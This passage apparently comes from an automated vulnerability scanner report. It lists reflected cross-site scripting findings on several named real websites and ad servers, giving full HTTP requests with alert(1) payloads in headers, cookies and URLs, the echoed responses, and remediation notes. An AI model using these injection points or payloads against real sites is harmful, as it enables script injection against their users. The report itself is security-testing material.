Set-Cookie: sswn=eb516b55614f10b9add26227e7a82a7a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: c=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: nn=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: hostid=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=www.prosolutionpills.com
Set-Cookie: a=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: t=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: b=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: ref=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: upsell=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: mh=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/
Set-Cookie: c=1; expires=Mon, 23-Apr-2012 11:20:07 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: src=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: nn=0; expires=Mon, 23-Apr-2012 11:20:07 GMT; path=/; domain=.prosolutionpills.com
Set-Cookie: cd=deleted; expires=Mon, 03-May-2010 11:20:06 GMT; path=/; domain=.prosolutionpills.com
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 29393

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Male Enhancement Pills, Natural Penis Enhancement, Penis Pills</title>
<meta
...[SNIP]...
<!-- CURRENT REFERRER: http://www.google.com/search?hl=en&q=66d34--><script>alert(1)</script>7df68a51f3f -->
...[SNIP]...

6.120. http://www.tradearca.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tradearca.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e30f9<script>alert(1)</script>15193fec68d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradearca.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=e30f9<script>alert(1)</script>15193fec68d

Response

HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 11:33:18 GMT
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 40919
Content-Type: text/html
Expires: Mon, 02 May 2011 11:32:18 GMT
Set-Cookie: ASPSESSIONIDCQTTRBQD=KDIHKEODGOIPMJMEIJNJBCLM; path=/
Cache-control: False


<HTML>
<HEAD>
<META NAME="googlebot" CONTENT="noarchive,noarchive,nofollow">
<META NAME="robots" CONTENT="noarchive,noindex,nofollow">
<TITLE>NYSE Arca > Page Not Found</TITLE>

<SCRIPT LANG
...[SNIP]...
<br>http://www.google.com/search?hl=en&q=e30f9<script>alert(1)</script>15193fec68d

               <br>
...[SNIP]...

6.121. http://www.youngtubeclub.com/favicon.ico [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youngtubeclub.com
Path:   /favicon.ico

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4fe4b'-alert(1)-'f2df1d0d80e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.youngtubeclub.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: 4fe4b'-alert(1)-'f2df1d0d80e

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:12:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Set-Cookie: PHPSESSID=7894c473c8235a927af5f4d0ccb84993; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 65679


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<title>Young Tube Club - Free young teen porn sex videos</title>
<meta name="d
...[SNIP]...
<!--
document.cookie='a2r=4fe4b'-alert(1)-'f2df1d0d80e#!; path=/;'
document.cookie='a2x=#!; path=/;'
document.cookie='a2u=0#!; path=/;'
document.cookie='a2b=4fe4b'-alert(1)-'f2df1d0d80e#!; path=/; expires=December 31, 2100;'
// -->
...[SNIP]...

6.122. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 10e64"-alert(1)-"2c88e7eb1d8 was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:42:08 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=67
Expires: Tue, 03 May 2011 15:43:15 GMT
Date: Tue, 03 May 2011 15:42:08 GMT
Connection: close
Content-Length: 2347

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=audiencescience300x25010e64"-alert(1)-"2c88e7eb1d8;z="+Math.random();}

if(zzuid=='unknown')zzuid='@HD0VAoBADQAAGbr14QAAAAA~050311';

var zzhasAd=undefined;


                                   var zzStr = "s=1;u=@HD0VAoBADQAAGbr14QAAAA
...[SNIP]...

6.123. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [FFpb cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the FFpb cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6d18'-alert(1)-'bdf7ec3c1de was submitted in the FFpb cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=2/1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.05692060776185648 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=933,56,15:826,276,9:1190,1,9; FFad=1:0:2; FFChanCap=1583B1190,1#675962#675816#812963|0,1,1:0,1,1:0,1,1; ZEDOIDX=21; aps=2; FFpb=1190:audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de; ZEDOIDA=@HD0VAoBADQAAGbr14QAAAAA~050311; FFCap=1583B933,196008,139660|0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1190:audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1190,2,9:933,56,15:826,276,9:1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:1:0:2;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1583B1190,1#675962#675816#812963,2#894866|0,1,1:0,1,1:0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:42:08 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:42:08 GMT
Connection: close
Content-Length: 2347

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=audiencescience300x250d6d18'-alert(1)-'bdf7ec3c1de;z="+Math.random();}

if(zzuid=='unknown')zzuid='@HD0VAoBADQAAGbr14QAAAAA
...[SNIP]...

6.124. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [ZEDOIDA cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The value of the ZEDOIDA cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74d0c"-alert(1)-"608dd61467a was submitted in the ZEDOIDA cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1&a=0&f=&n=1190&r=5&d=9&q=&$=&s=1&z=0.01697743690668352 HTTP/1.1
Host: d7.zedo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/favicon.ico?be4e4%22-alert(1)-%22ccebc516c28=1
Cookie: ZCBC=1; FFgeo=2241452; FFcat=1190,1,9; FFad=0; FFChanCap=1583B1190,1#675962|0,1,1; ZEDOIDA=-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a; ZEDOIDX=21

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1583B1190,1#675962#675816|0,1,1:0,1,1;expires=Thu, 02 Jun 2011 15:41:18 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1190,1,9;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1;expires=Wed, 04 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 1634247266 1634246238
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=116
Expires: Tue, 03 May 2011 15:43:14 GMT
Date: Tue, 03 May 2011 15:41:18 GMT
Connection: close
Content-Length: 2339

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCus
...[SNIP]...
zuid='-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=-SHATcGt89Z6bBFZFIn3XV-r~05031174d0c"-alert(1)-"608dd61467a;z=" + Math.random();
var ainfo = "";

var zzDate = new Date();
var zzWindow;
var zzURL;
if (typeof zzCustom =='undefined'){var zzIdxCustom ='';}
else{var zzIdxCustom = zzCustom;}
if (typeof zzTrd
...[SNIP]...

6.125. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 722dd"%3balert(1)//f296103105c was submitted in the cli cookie. This input was echoed as 722dd";alert(1)//f296103105c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c722dd"%3balert(1)//f296103105c; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:29 GMT
Content-Length: 8193

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
</scr'+'ipt>');CollectiveMedia.addPixel("http://ib.adnxs.com/mapuid?member=311&user=11fda490648f83c722dd";alert(1)//f296103105c&seg_code=noseg&ord=1304437409",true);CollectiveMedia.addPixel("http://pixel.quantserve.com/pixel/p-86ZJnSph3DaTI.gif",false);CollectiveMedia.addPixel("http://r.nexac.com/e/getdata.xgi?dt=br&pkey=xkeii
...[SNIP]...

6.126. http://k.collective-media.net/cmadj/cm.rev_lee/ [cli cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://k.collective-media.net
Path:   /cmadj/cm.rev_lee/

Issue detail

The value of the cli cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cbe0'%3balert(1)//498261d4339 was submitted in the cli cookie. This input was echoed as 6cbe0';alert(1)//498261d4339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/cm.rev_lee/;sz=300x250;net=cm;ord=0.3433780161396228;ord1=975335;cmpgurl=http%253A//www.maysville-online.com/content/%253Fc3a2e%252522-alert%2528%252522DORK%252522%2529-%252522f8cf8d87874%253D1? HTTP/1.1
Host: k.collective-media.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.maysville-online.com/content/?c3a2e%22-alert(%22DORK%22)-%22f8cf8d87874=1
Cookie: JY57=CT; cli=11fda490648f83c6cbe0'%3balert(1)//498261d4339; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Tue, 03 May 2011 15:43:29 GMT
Connection: close
Set-Cookie: apnx=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Wed, 04-May-2011 15:43:29 GMT
Set-Cookie: nadp=1; domain=collective-media.net; path=/; expires=Tue, 10-May-2011 15:43:29 GMT
Set-Cookie: blue=1; domain=collective-media.net; path=/; expires=Tue, 03-May-2011 23:43:29 GMT
Content-Length: 8193

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-37937282_1304437409","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_lee&size=300x250&imp_id=cm-37937282_1304437409,11fda490648f83c6cbe0';alert(1)//498261d4339&referrer=http%3A%2F%2Fwww.maysville-online.com%2Fcontent%2F%3Fc3a2e%2522-alert%28%2522DORK%2522%29-%2522f8cf8d87874%3D1&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.rev_lee%2F%3Bnet%3Dcm%3Bu%3D%2C
...[SNIP]...

6.127. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b847"><script>alert(1)</script>b3c95de9fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:25 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 361
Location: http://adaeveningnews.com/favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:25 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache1.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache1.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/favicon.ico8b847"><script>alert(1)</script>b3c95de9fa8">
...[SNIP]...

6.128. http://www.adaeveningnews.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 36b93<script>alert(1)</script>f929a837cc8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico36b93<script>alert(1)</script>f929a837cc8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:25 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 357
Location: http://adaeveningnews.com/favicon.ico36b93<script>alert(1)</script>f929a837cc8
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:25 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache4.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache4.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/
...[SNIP]...
</script>f929a837cc8">http://adaeveningnews.com/favicon.ico36b93<script>alert(1)</script>f929a837cc8</a>
...[SNIP]...

6.129. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adaeveningnews.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99560"><script>alert(1)</script>0b27b877563 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /favicon.ico?99560"><script>alert(1)</script>0b27b877563=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.adaeveningnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 301 Moved Permanently
Date: Tue, 03 May 2011 11:04:24 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
X-Content-Type-Warning: guessed from content
Content-Length: 367
Location: http://adaeveningnews.com/favicon.ico?99560"><script>alert(1)</script>0b27b877563=1
Cache-Control: max-age=3600
Expires: Tue, 03 May 2011 12:04:24 GMT
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent2.peak.zope.net
X-Cache: MISS from cache3.peak.zope.net
Via: 1.0 parent2.peak.zope.net:8500 (squid/2.7.STABLE9), 1.0 cache3.peak.zope.net:8500 (squid)
Connection: close

<html>
<head>
<title>Resource Moved</title>
</head>
<body>
<p>This resource has been moved. Click the following link if you are not
automatically redirected: <a href="http://adaeveningnews.com/favicon.ico?99560"><script>alert(1)</script>0b27b877563=1">
...[SNIP]...

6.130. http://www.adaeveningnews.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
